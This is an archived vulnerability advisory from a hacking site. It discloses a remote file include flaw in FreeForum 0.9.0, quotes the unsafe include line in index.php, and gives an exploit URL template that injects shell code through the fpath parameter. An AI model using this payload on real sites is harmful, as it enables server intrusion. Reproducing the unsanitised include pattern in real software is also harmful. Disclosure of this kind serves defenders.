AOH :: HP Unsorted F :: C07-2000.HTM

FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability



FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability
FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability



%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability

Script: FreeForum

Version: 0.9.0

URL: http://www.phpfreaks.com/scripts.php?action=gotoDownload&script_id=616 

Found By : BorN To K!LL

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Bug in : index.php

code :
include("$fpath/forum.php");

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Explo!T :.
^^^^^
/index.php?fpath=[SHe1L-CoDe]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

GreeTz To :.

Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  ThE-LoRd-Of-CrAcKiNg  ,  SHiKaA 
  ,  str0ke

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________________________________________________________
The MSN Entertainment Guide to Golden Globes is here.  Get all the scoop. 
http://tv.msn.com/tv/globes2007/?icid=nctagline2 


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.